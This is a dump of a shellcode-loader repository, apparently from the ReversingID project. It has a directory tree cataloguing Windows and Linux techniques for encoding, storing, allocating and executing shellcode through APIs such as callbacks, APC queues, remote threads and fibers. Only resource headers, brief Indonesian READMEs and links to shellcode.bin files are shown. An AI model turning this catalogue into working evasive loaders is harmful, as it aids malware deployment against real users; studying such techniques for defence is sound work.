├── windows
    ├── storage
    │   ├── resource
    │   │   ├── c++
    │   │   │   ├── resources.h
    │   │   │   ├── resources.rc
    │   │   │   ├── resources.res
    │   │   │   └── shellcode.bin
    │   │   └── README.md
    │   ├── stack
    │   │   ├── dart
    │   │   │   └── pubspec.yaml
    │   │   ├── README.md
    │   │   ├── rust
    │   │   │   ├── plain-winapi
    │   │   │   │   └── Cargo.toml
    │   │   │   └── with-wrapper
    │   │   │   │   └── Cargo.toml
    │   │   ├── crystal
    │   │   │   └── code.cr
    │   │   └── nim
    │   │   │   └── code.nim
    │   ├── global
    │   │   └── README.md
    │   ├── section
    │   │   ├── rust
    │   │   │   └── Cargo.toml
    │   │   ├── README.md
    │   │   └── c++
    │   │   │   └── code.cpp
    │   └── README.md
    ├── execution
    │   ├── callback
    │   │   ├── EnumResourceLanguages
    │   │   │   ├── c++
    │   │   │   │   ├── resources.h
    │   │   │   │   └── resources.rc
    │   │   │   └── README.md
    │   │   ├── EnumResourceTypes
    │   │   │   ├── c++
    │   │   │   │   └── resource-self
    │   │   │   │   │   ├── resources.h
    │   │   │   │   │   ├── resources.rc
    │   │   │   │   │   └── shellcode.bin
    │   │   │   └── README.md
    │   │   ├── EnumResourceTypesEx
    │   │   │   ├── c++
    │   │   │   │   └── resource-self
    │   │   │   │   │   ├── resources.h
    │   │   │   │   │   ├── resources.rc
    │   │   │   │   │   └── shellcode.bin
    │   │   │   └── README.md
    │   │   ├── EnumResourceNames
    │   │   │   ├── c++
    │   │   │   │   └── resource-self
    │   │   │   │   │   ├── resources.h
    │   │   │   │   │   ├── shellcode.bin
    │   │   │   │   │   └── resources.rc
    │   │   │   └── README.md
    │   │   ├── EnumResourceNamesEx
    │   │   │   ├── c++
    │   │   │   │   └── resource-self
    │   │   │   │   │   ├── resources.h
    │   │   │   │   │   ├── shellcode.bin
    │   │   │   │   │   └── resources.rc
    │   │   │   └── README.md
    │   │   ├── EnumWindows
    │   │   │   └── README.md
    │   │   ├── EnumObjects
    │   │   │   └── README.md
    │   │   ├── LdrpCallInitRoutine
    │   │   │   └── README.md
    │   │   ├── LineDDA
    │   │   │   └── README.md
    │   │   ├── EnumMetaFile
    │   │   │   └── README.md
    │   │   ├── EnumPwrSchemes
    │   │   │   └── README.md
    │   │   ├── EnumChildWindows
    │   │   │   └── README.md
    │   │   ├── EnumThreadWindows
    │   │   │   └── README.md
    │   │   ├── ImmEnumInputContext
    │   │   │   └── README.md
    │   │   ├── acmDriverEnum
    │   │   │   └── README.md
    │   │   ├── EnumDesktopWindows
    │   │   │   └── README.md
    │   │   ├── EnumSystemGeoID
    │   │   │   └── README.md
    │   │   ├── LdrEnumerateLoadedModules
    │   │   │   └── README.md
    │   │   ├── CopyFile2
    │   │   │   └── README.md
    │   │   ├── DirectSoundEnumerate
    │   │   │   └── README.md
    │   │   ├── CryptEnumOIDInfo
    │   │   │   └── README.md
    │   │   ├── EnumDisplayMonitors
    │   │   │   └── README.md
    │   │   ├── EnumTimeFormatsEx
    │   │   │   └── README.md
    │   │   ├── InitOnceExecuteOnce
    │   │   │   └── README.md
    │   │   ├── PlaExtractCabinet
    │   │   │   └── README.md
    │   │   ├── DirectSoundCaptureEnumerate
    │   │   │   └── README.md
    │   │   ├── EnumSystemLocalesEx
    │   │   │   └── README.md
    │   │   ├── CertEnumSystemStore
    │   │   │   └── README.md
    │   │   ├── EnumDateFormatsExEx
    │   │   │   └── README.md
    │   │   ├── CertEnumPhysicalStore
    │   │   │   └── README.md
    │   │   ├── EnumerateLoadedModules
    │   │   │   └── README.md
    │   │   ├── README.md
    │   │   ├── FindDebugInfoFileEx
    │   │   │   └── README.md
    │   │   ├── CertEnumSystemStoreLocation
    │   │   │   └── README.md
    │   │   ├── ImageGetDigestStream
    │   │   │   └── README.md
    │   │   ├── FindExecutableImageEx
    │   │   │   └── README.md
    │   │   ├── CryptEnumOIDFunction
    │   │   │   └── README.md
    │   │   ├── EnumCalendarInfoExEx
    │   │   │   └── README.md
    │   │   ├── VerifierEnumerateResource
    │   │   │   └── README.md
    │   │   ├── waveInOpen
    │   │   │   └── README.md
    │   │   ├── waveOutOpen
    │   │   │   └── README.md
    │   │   ├── NotifyTeredoPortChange
    │   │   │   └── README.md
    │   │   ├── NotifyRouteChange2
    │   │   │   └── README.md
    │   │   ├── PrintDlg
    │   │   │   └── README.md
    │   │   ├── ChooseFont
    │   │   │   └── README.md
    │   │   ├── CryptEnumKeyIdentifierProperties
    │   │   │   └── README.md
    │   │   ├── EnumDesktops
    │   │   │   └── README.md
    │   │   ├── EnumPageFiles
    │   │   │   └── README.md
    │   │   ├── SHBrowseForFolder
    │   │   │   └── README.md
    │   │   ├── ChooseColor
    │   │   │   └── README.md
    │   │   ├── PageSetupDlg
    │   │   │   └── README.md
    │   │   ├── EnumSystemLanguageGroups
    │   │   │   └── README.md
    │   │   ├── EnumWindowStations
    │   │   │   └── README.md
    │   │   ├── NotifyUnicastIpAddressChange
    │   │   │   └── README.md
    │   │   ├── EnumSystemLocales
    │   │   │   └── README.md
    │   │   ├── EnumDateFormats
    │   │   │   └── README.md
    │   │   ├── EnumTimeFormats
    │   │   │   └── README.md
    │   │   ├── mmioInstallIOProc
    │   │   │   └── README.md
    │   │   ├── EnumSystemCodePages
    │   │   │   └── README.md
    │   │   ├── SymEnumProcesses
    │   │   │   └── README.md
    │   │   ├── CallWindowProc
    │   │   │   └── README.md
    │   │   ├── EnumDateFormatsEx
    │   │   │   └── README.md
    │   │   ├── EnumUILanguages
    │   │   │   └── README.md
    │   │   ├── NotifyIpInterfaceChange
    │   │   │   └── README.md
    │   │   ├── PropertySheet
    │   │   │   └── README.md
    │   │   ├── EnumCalendarInfo
    │   │   │   └── README.md
    │   │   ├── EnumCalendarInfoEx
    │   │   │   └── README.md
    │   │   ├── DrawState
    │   │   │   └── README.md
    │   │   ├── GrayString
    │   │   │   └── README.md
    │   │   ├── mciSetYieldProc
    │   │   │   └── README.md
    │   │   ├── EnumFonts
    │   │   │   └── README.md
    │   │   ├── CryptVerifyMessageSignature
    │   │   │   └── README.md
    │   │   ├── DPA_DestroyCallback
    │   │   │   └── README.md
    │   │   ├── CopyFileEx
    │   │   │   └── README.md
    │   │   ├── DSA_DestroyCallback
    │   │   │   └── README.md
    │   │   ├── SymFindFileInPath
    │   │   │   └── README.md
    │   │   ├── EnumFontFamilies
    │   │   │   └── README.md
    │   │   ├── CreatePropertySheetPage
    │   │   │   └── README.md
    │   │   ├── EnumLanguageGroupLocales
    │   │   │   └── README.md
    │   │   ├── DialogBoxIndirectParam
    │   │   │   └── README.md
    │   │   ├── GetOpenFileName
    │   │   │   └── README.md
    │   │   ├── GetSaveFileName
    │   │   │   └── README.md
    │   │   ├── EnumFontFamiliesEx
    │   │   │   └── README.md
    │   │   ├── SetWinEventHook
    │   │   │   └── README.md
    │   │   ├── CryptDecodeMessage
    │   │   │   └── README.md
    │   │   ├── DPA_EnumCallback
    │   │   │   └── README.md
    │   │   ├── DSA_EnumCallback
    │   │   │   └── README.md
    │   │   ├── SendMessageCallback
    │   │   │   └── README.md
    │   │   ├── EnumDirTree
    │   │   │   └── README.md
    │   │   ├── WsPullBytes
    │   │   │   └── README.md
    │   │   ├── WsPushBytes
    │   │   │   └── README.md
    │   │   ├── MappingRecognizeText
    │   │   │   └── README.md
    │   │   ├── ReadFileEx
    │   │   │   └── README.md
    │   │   ├── WriteFileEx
    │   │   │   └── README.md
    │   │   ├── CertFindChainInStore
    │   │   │   └── README.md
    │   │   ├── EnumerateLoadedModulesEx
    │   │   │   └── README.md
    │   │   ├── CryptInstallOIDFunctionAddress
    │   │   │   └── README.md
    │   │   └── EnumProps
    │   │   │   └── README.md
    │   ├── event
    │   │   ├── README.md
    │   │   ├── SetTimer
    │   │   │   └── README.md
    │   │   ├── QueueUserAPC
    │   │   │   └── README.md
    │   │   ├── NtQueueApcThreadEx
    │   │   │   └── README.md
    │   │   ├── NtQueueApcThread
    │   │   │   └── README.md
    │   │   ├── RegisterWaitForSingleObject
    │   │   │   └── README.md
    │   │   ├── timeSetEvent
    │   │   │   └── README.md
    │   │   ├── CreateThreadpoolWait
    │   │   │   └── README.md
    │   │   └── CreateThreadpoolTimer
    │   │   │   └── README.md
    │   ├── asm-jmp
    │   │   ├── README.md
    │   │   └── rust
    │   │   │   └── Cargo.toml
    │   ├── exception
    │   │   ├── seh-catch-exception
    │   │   │   └── README.md
    │   │   ├── SetUnhandledExceptionFilter
    │   │   │   └── README.md
    │   │   └── AddVectoredExceptionHandler
    │   │   │   └── README.md
    │   ├── invoke
    │   │   ├── README.md
    │   │   ├── rust
    │   │   │   └── with-mmap
    │   │   │   │   ├── Cargo.toml
    │   │   │   │   └── src
    │   │   │   │       └── main.rs
    │   │   └── nim
    │   │   │   └── code.nim
    │   ├── thread
    │   │   ├── CreateRemoteThread
    │   │   │   ├── rust
    │   │   │   │   ├── with-windows-sys
    │   │   │   │   │   └── Cargo.toml
    │   │   │   │   └── with-winapi
    │   │   │   │   │   └── Cargo.toml
    │   │   │   └── README.md
    │   │   ├── CreateThread
    │   │   │   ├── rust
    │   │   │   │   └── Cargo.toml
    │   │   │   └── README.md
    │   │   ├── TpSimpleTryPost
    │   │   │   └── README.md
    │   │   ├── tls-callback
    │   │   │   └── README.md
    │   │   ├── SHCreateThread
    │   │   │   └── README.md
    │   │   ├── README.md
    │   │   ├── TrySubmitThreadpoolCallback
    │   │   │   └── README.md
    │   │   ├── SHCreateThreadWithHandle
    │   │   │   └── README.md
    │   │   ├── EtwpCreateEtwThread
    │   │   │   └── README.md
    │   │   ├── CreateThreadpoolWork
    │   │   │   └── README.md
    │   │   ├── NtCreateThreadEx
    │   │   │   └── README.md
    │   │   ├── RtlCreateUserThread
    │   │   │   └── README.md
    │   │   └── CreateRemoteThreadEx
    │   │   │   └── README.md
    │   ├── fiber
    │   │   ├── CreateFiber
    │   │   │   ├── rust
    │   │   │   │   └── Cargo.toml
    │   │   │   └── README.md
    │   │   ├── README.md
    │   │   ├── CreateFiberEx
    │   │   │   └── README.md
    │   │   ├── FlsAlloc
    │   │   │   └── README.md
    │   │   └── RtlUserFiberStart
    │   │   │   └── README.md
    │   └── README.md
    ├── writing
    │   ├── custom
    │   │   ├── bit-swap
    │   │   │   ├── c++
    │   │   │   │   ├── shellcode.bin
    │   │   │   │   └── generate.py
    │   │   │   └── README.md
    │   │   ├── feistel
    │   │   │   ├── c++
    │   │   │   │   ├── shellcode.bin
    │   │   │   │   └── generate.py
    │   │   │   └── README.md
    │   │   ├── xor-lfsr
    │   │   │   ├── c++
    │   │   │   │   ├── shellcode.bin
    │   │   │   │   └── generate.py
    │   │   │   └── README.md
    │   │   ├── xor-pair
    │   │   │   ├── c++
    │   │   │   │   ├── shellcode.bin
    │   │   │   │   └── generate.py
    │   │   │   └── README.md
    │   │   ├── bit-inverse
    │   │   │   ├── c++
    │   │   │   │   └── shellcode.bin
    │   │   │   └── README.md
    │   │   ├── printable
    │   │   │   ├── c++
    │   │   │   │   ├── shellcode.bin
    │   │   │   │   └── generate.py
    │   │   │   └── README.md
    │   │   ├── xor-chain
    │   │   │   ├── c++
    │   │   │   │   ├── shellcode.bin
    │   │   │   │   └── generate.py
    │   │   │   └── README.md
    │   │   ├── bit-crossover
    │   │   │   └── c++
    │   │   │   │   ├── shellcode.bin
    │   │   │   │   └── generate.py
    │   │   ├── bit-rotation
    │   │   │   └── c++
    │   │   │   │   ├── shellcode.bin
    │   │   │   │   └── generate.py
    │   │   ├── xor-multikey
    │   │   │   ├── c++
    │   │   │   │   ├── shellcode.bin
    │   │   │   │   └── generate.py
    │   │   │   └── README.md
    │   │   ├── xor-singlekey
    │   │   │   ├── c++
    │   │   │   │   ├── shellcode.bin
    │   │   │   │   └── generate.py
    │   │   │   └── README.md
    │   │   ├── padding-dynamic
    │   │   │   ├── c++
    │   │   │   │   ├── shellcode.bin
    │   │   │   │   └── generate.py
    │   │   │   └── README.md
    │   │   └── xor-singlekey-ctr
    │   │   │   ├── c++
    │   │   │       ├── shellcode.bin
    │   │   │       └── generate.py
    │   │   │   └── README.md
    │   ├── permutation
    │   │   ├── snake
    │   │   │   ├── c++
    │   │   │   │   ├── shellcode.bin
    │   │   │   │   └── generate.py
    │   │   │   └── README.md
    │   │   ├── spiral
    │   │   │   ├── c++
    │   │   │   │   └── shellcode.bin
    │   │   │   └── README.md
    │   │   ├── rail-fence
    │   │   │   ├── c++
    │   │   │   │   ├── shellcode.bin
    │   │   │   │   └── generate.py
    │   │   │   └── README.md
    │   │   ├── fisher-yates
    │   │   │   ├── c++
    │   │   │   │   └── shellcode.bin
    │   │   │   └── README.md
    │   │   ├── row-ordering
    │   │   │   ├── c++
    │   │   │   │   └── shellcode.bin
    │   │   │   └── README.md
    │   │   ├── column-ordering
    │   │   │   ├── c++
    │   │   │   │   └── shellcode.bin
    │   │   │   └── README.md
    │   │   └── README.md
    │   ├── encryption
    │   │   ├── block
    │   │   │   ├── des
    │   │   │   │   ├── c++
    │   │   │   │   │   └── shellcode.bin
    │   │   │   │   └── README.md
    │   │   │   ├── lea
    │   │   │   │   ├── c++
    │   │   │   │   │   └── shellcode.bin
    │   │   │   │   └── README.md
    │   │   │   ├── tea
    │   │   │   │   ├── c++
    │   │   │   │   │   └── shellcode.bin
    │   │   │   │   └── README.md
    │   │   │   ├── 3-way
    │   │   │   │   ├── c++
    │   │   │   │   │   └── shellcode.bin
    │   │   │   │   └── README.md
    │   │   │   ├── anubis
    │   │   │   │   ├── c++
    │   │   │   │   │   └── shellcode.bin
    │   │   │   │   └── README.md
    │   │   │   ├── clefia
    │   │   │   │   ├── c++
    │   │   │   │   │   └── shellcode.bin
    │   │   │   │   └── README.md
    │   │   │   ├── khazad
    │   │   │   │   ├── c++
    │   │   │   │   │   └── shellcode.bin
    │   │   │   │   └── README.md
    │   │   │   ├── khufu
    │   │   │   │   ├── c++
    │   │   │   │   │   └── shellcode.bin
    │   │   │   │   └── README.md
    │   │   │   ├── mars
    │   │   │   │   ├── c++
    │   │   │   │   │   └── shellcode.bin
    │   │   │   │   └── README.md
    │   │   │   ├── safer
    │   │   │   │   ├── c++
    │   │   │   │   │   └── shellcode.bin
    │   │   │   │   └── README.md
    │   │   │   ├── xtea
    │   │   │   │   ├── c++
    │   │   │   │   │   └── shellcode.bin
    │   │   │   │   └── README.md
    │   │   │   ├── blowfish
    │   │   │   │   ├── c++
    │   │   │   │   │   └── shellcode.bin
    │   │   │   │   └── README.md
    │   │   │   ├── camellia
    │   │   │   │   ├── c++
    │   │   │   │   │   └── shellcode.bin
    │   │   │   │   └── README.md
    │   │   │   ├── lucifer
    │   │   │   │   ├── c++
    │   │   │   │   │   └── shellcode.bin
    │   │   │   │   └── README.md
    │   │   │   ├── treyfer
    │   │   │   │   ├── c++
    │   │   │   │   │   └── shellcode.bin
    │   │   │   │   └── README.md
    │   │   │   ├── hierocrypt3
    │   │   │   │   ├── c++
    │   │   │   │   │   └── shellcode.bin
    │   │   │   │   └── README.md
    │   │   │   ├── aes
    │   │   │   │   └── CryptDecrypt
    │   │   │   │   │   └── c++
    │   │   │   │   │       └── shellcode.bin
    │   │   │   ├── cipherunicorn-a
    │   │   │   │   ├── c++
    │   │   │   │   │   └── shellcode.bin
    │   │   │   │   └── README.md
    │   │   │   └── README.md
    │   │   ├── stream
    │   │   │   ├── rc4
    │   │   │   │   └── SystemFunction
    │   │   │   │   │   ├── c++
    │   │   │   │   │       └── shellcode.bin
    │   │   │   │   │   └── README.md
    │   │   │   └── README.md
    │   │   └── README.md
    │   ├── substitution
    │   │   ├── atbash
    │   │   │   ├── c++
    │   │   │   │   └── shellcode.bin
    │   │   │   └── README.md
    │   │   ├── hill-cipher
    │   │   │   ├── c++
    │   │   │   │   └── shellcode.bin
    │   │   │   └── README.md
    │   │   └── affine-cipher
    │   │   │   ├── c++
    │   │   │       └── shellcode.bin
    │   │   │   └── README.md
    │   ├── compression
    │   │   └── Decompress
    │   │   │   └── c++
    │   │   │       └── shellcode.bin
    │   ├── conversion
    │   │   ├── endianness
    │   │   │   ├── c++
    │   │   │   │   └── shellcode.bin
    │   │   │   └── README.md
    │   │   ├── UuidFromString
    │   │   │   └── c++
    │   │   │   │   └── shellcode.bin
    │   │   ├── RtlIpv4StringToAddress
    │   │   │   └── c++
    │   │   │   │   └── shellcode.bin
    │   │   ├── RtlIpv6StringToAddress
    │   │   │   └── c++
    │   │   │   │   └── shellcode.bin
    │   │   ├── RtlIpv4StringToAddressEx
    │   │   │   └── c++
    │   │   │   │   └── shellcode.bin
    │   │   ├── RtlEthernetStringToAddress
    │   │   │   └── c++
    │   │   │   │   └── shellcode.bin
    │   │   └── README.md
    │   ├── misc
    │   │   └── rust
    │   │   │   └── memmap2
    │   │   │       ├── README.md
    │   │   │       ├── Cargo.toml
    │   │   │       └── src
    │   │   │           └── main.rs
    │   ├── copy
    │   │   ├── memcpy
    │   │   │   └── README.md
    │   │   ├── RtlMoveMemory
    │   │   │   └── README.md
    │   │   ├── CopyMemory
    │   │   │   └── README.md
    │   │   ├── MoveMemory
    │   │   │   └── README.md
    │   │   ├── WriteProcessMemory
    │   │   │   └── README.md
    │   │   ├── NtWriteVirtualMemory
    │   │   │   └── README.md
    │   │   └── CreatePipe
    │   │   │   └── README.md
    │   └── README.md
    ├── permission
    │   ├── VirtualProtect
    │   │   └── README.md
    │   ├── README.md
    │   ├── VirtualProtectEx
    │   │   └── README.md
    │   └── NtProtectVirtualMemory
    │   │   └── README.md
    └── allocation
    │   ├── AllocADsMem
    │       └── README.md
    │   ├── CoTaskMemAlloc
    │       └── README.md
    │   ├── GlobalAlloc-GPTR
    │       └── README.md
    │   ├── VirtualAlloc
    │       └── README.md
    │   ├── GlobalAlloc-GHND
    │       └── README.md
    │   ├── VirtualAllocEx
    │       └── README.md
    │   ├── VirtualAlloc2
    │       └── README.md
    │   ├── README.md
    │   ├── HeapAlloc
    │       └── README.md
    │   ├── RtlAllocateHeap
    │       └── README.md
    │   └── NtAllocateVirtualMemory
    │       └── README.md
└── linux
    ├── execution
        ├── event
        │   ├── README.md
        │   ├── signal
        │   │   └── README.md
        │   ├── sigaction
        │   │   └── README.md
        │   ├── atexit
        │   │   └── README.md
        │   └── pthread_atfork
        │   │   └── README.md
        ├── invoke
        │   └── README.md
        ├── thread
        │   ├── README.md
        │   ├── clone
        │   │   └── README.md
        │   └── pthread_create
        │   │   └── README.md
        ├── callback
        │   ├── README.md
        │   ├── ftw
        │   │   └── README.md
        │   ├── nftw
        │   │   └── README.md
        │   ├── qsort
        │   │   └── README.md
        │   ├── bsearch
        │   │   └── README.md
        │   ├── scandir
        │   │   └── README.md
        │   └── fts_open
        │   │   └── README.md
        └── README.md
    ├── storage
        ├── stack
        │   └── README.md
        └── README.md
    ├── allocation
        ├── README.md
        ├── mmap
        │   └── README.md
        ├── shmat
        │   └── README.md
        ├── posix_memalign
        │   └── README.md
        ├── pvalloc
        │   └── README.md
        ├── memalign
        │   └── README.md
        └── valloc
        │   └── README.md
    ├── permission
        └── README.md
    └── writing
        └── README.md


/windows/storage/resource/c++/resources.h:
--------------------------------------------------------------------------------
1 | #define SHELLCODE 100
2 | 


--------------------------------------------------------------------------------
/windows/execution/callback/EnumResourceLanguages/c++/resources.h:
--------------------------------------------------------------------------------
1 | #define REVID_STRING 1
2 | 


--------------------------------------------------------------------------------
/windows/execution/callback/EnumResourceTypes/c++/resource-self/resources.h:
--------------------------------------------------------------------------------
1 | #define SHELLCODE 100
2 | 


--------------------------------------------------------------------------------
/windows/execution/callback/EnumResourceTypesEx/c++/resource-self/resources.h:
--------------------------------------------------------------------------------
1 | #define SHELLCODE 100
2 | 


--------------------------------------------------------------------------------
/windows/storage/resource/c++/resources.rc:
--------------------------------------------------------------------------------
1 | #include "resources.h"
2 | 
3 | SHELLCODE RCDATA shellcode.bin


--------------------------------------------------------------------------------
/linux/execution/event/README.md:
--------------------------------------------------------------------------------
1 | # Shellcode Loader
2 | 
3 | ### Overview
4 | 
5 | Eksekusi shellcode berdasarkan event tertentu.


--------------------------------------------------------------------------------
/windows/execution/callback/EnumResourceNames/c++/resource-self/resources.h:
--------------------------------------------------------------------------------
1 | #define SHELLCODE 100
2 | #define ID_STRING 101
3 | 


--------------------------------------------------------------------------------
/windows/execution/callback/EnumResourceNamesEx/c++/resource-self/resources.h:
--------------------------------------------------------------------------------
1 | #define SHELLCODE 100
2 | #define ID_STRING 101
3 | 


--------------------------------------------------------------------------------
/windows/execution/callback/EnumResourceTypes/c++/resource-self/resources.rc:
--------------------------------------------------------------------------------
1 | #include "resources.h"
2 | 
3 | SHELLCODE RCDATA shellcode.bin


--------------------------------------------------------------------------------
/windows/execution/event/README.md:
--------------------------------------------------------------------------------
1 | # Shellcode Loader
2 | 
3 | ### Overview
4 | 
5 | Eksekusi shellcode berdasarkan event tertentu.
6 | 


--------------------------------------------------------------------------------
/windows/execution/callback/EnumResourceTypesEx/c++/resource-self/resources.rc:
--------------------------------------------------------------------------------
1 | #include "resources.h"
2 | 
3 | SHELLCODE RCDATA shellcode.bin


--------------------------------------------------------------------------------
/windows/storage/resource/c++/resources.res:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/storage/resource/c++/resources.res


--------------------------------------------------------------------------------
/windows/storage/resource/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/storage/resource/c++/shellcode.bin


--------------------------------------------------------------------------------
/windows/execution/asm-jmp/README.md:
--------------------------------------------------------------------------------
1 | # Shellcode Loader
2 | 
3 | ### Overview
4 | 
5 | Eksekusi shellcode dengan menuju langsung (jump) ke alamat shellcode.


--------------------------------------------------------------------------------
/windows/execution/callback/EnumResourceLanguages/c++/resources.rc:
--------------------------------------------------------------------------------
1 | #include "resources.h"
2 | 
3 | STRINGTABLE
4 | BEGIN
5 |     REVID_STRING, "ReversingID"
6 | END 


--------------------------------------------------------------------------------
/windows/writing/custom/bit-swap/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/custom/bit-swap/c++/shellcode.bin


--------------------------------------------------------------------------------
/windows/writing/custom/feistel/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/custom/feistel/c++/shellcode.bin


--------------------------------------------------------------------------------
/windows/writing/custom/xor-lfsr/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/custom/xor-lfsr/c++/shellcode.bin


--------------------------------------------------------------------------------
/windows/writing/custom/xor-pair/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/custom/xor-pair/c++/shellcode.bin


--------------------------------------------------------------------------------
/windows/writing/custom/bit-inverse/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/custom/bit-inverse/c++/shellcode.bin


--------------------------------------------------------------------------------
/windows/writing/custom/printable/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/custom/printable/c++/shellcode.bin


--------------------------------------------------------------------------------
/windows/writing/custom/xor-chain/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/custom/xor-chain/c++/shellcode.bin


--------------------------------------------------------------------------------
/windows/writing/permutation/snake/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/permutation/snake/c++/shellcode.bin


--------------------------------------------------------------------------------
/windows/writing/permutation/spiral/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/permutation/spiral/c++/shellcode.bin


--------------------------------------------------------------------------------
/windows/writing/custom/bit-crossover/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/custom/bit-crossover/c++/shellcode.bin


--------------------------------------------------------------------------------
/windows/writing/custom/bit-rotation/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/custom/bit-rotation/c++/shellcode.bin


--------------------------------------------------------------------------------
/windows/writing/custom/xor-multikey/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/custom/xor-multikey/c++/shellcode.bin


--------------------------------------------------------------------------------
/windows/writing/custom/xor-singlekey/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/custom/xor-singlekey/c++/shellcode.bin


--------------------------------------------------------------------------------
/windows/writing/encryption/block/des/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/encryption/block/des/c++/shellcode.bin


--------------------------------------------------------------------------------
/windows/writing/encryption/block/lea/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/encryption/block/lea/c++/shellcode.bin


--------------------------------------------------------------------------------
/windows/writing/encryption/block/tea/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/encryption/block/tea/c++/shellcode.bin


--------------------------------------------------------------------------------
/windows/writing/substitution/atbash/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/substitution/atbash/c++/shellcode.bin


--------------------------------------------------------------------------------
/windows/writing/compression/Decompress/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/compression/Decompress/c++/shellcode.bin


--------------------------------------------------------------------------------
/windows/writing/conversion/endianness/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/conversion/endianness/c++/shellcode.bin


--------------------------------------------------------------------------------
/windows/writing/custom/padding-dynamic/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/custom/padding-dynamic/c++/shellcode.bin


--------------------------------------------------------------------------------
/windows/writing/encryption/block/3-way/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/encryption/block/3-way/c++/shellcode.bin


--------------------------------------------------------------------------------
/windows/writing/encryption/block/anubis/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/encryption/block/anubis/c++/shellcode.bin


--------------------------------------------------------------------------------
/windows/writing/encryption/block/clefia/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/encryption/block/clefia/c++/shellcode.bin


--------------------------------------------------------------------------------
/windows/writing/encryption/block/khazad/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/encryption/block/khazad/c++/shellcode.bin


--------------------------------------------------------------------------------
/windows/writing/encryption/block/khufu/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/encryption/block/khufu/c++/shellcode.bin


--------------------------------------------------------------------------------
/windows/writing/encryption/block/mars/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/encryption/block/mars/c++/shellcode.bin


--------------------------------------------------------------------------------
/windows/writing/encryption/block/safer/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/encryption/block/safer/c++/shellcode.bin


--------------------------------------------------------------------------------
/windows/writing/encryption/block/xtea/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/encryption/block/xtea/c++/shellcode.bin


--------------------------------------------------------------------------------
/windows/writing/permutation/rail-fence/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/permutation/rail-fence/c++/shellcode.bin


--------------------------------------------------------------------------------
/windows/writing/conversion/UuidFromString/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/conversion/UuidFromString/c++/shellcode.bin


--------------------------------------------------------------------------------
/windows/writing/custom/xor-singlekey-ctr/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/custom/xor-singlekey-ctr/c++/shellcode.bin


--------------------------------------------------------------------------------
/windows/writing/encryption/block/blowfish/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/HEAD/windows/writing/encryption/block/blowfish/c++/shellcode.bin


--------------------------------------------------------------------------------
/windows/writing/encryption/block/camellia/c++/shellcode.bin:
--------------------------------------------------------------------------------
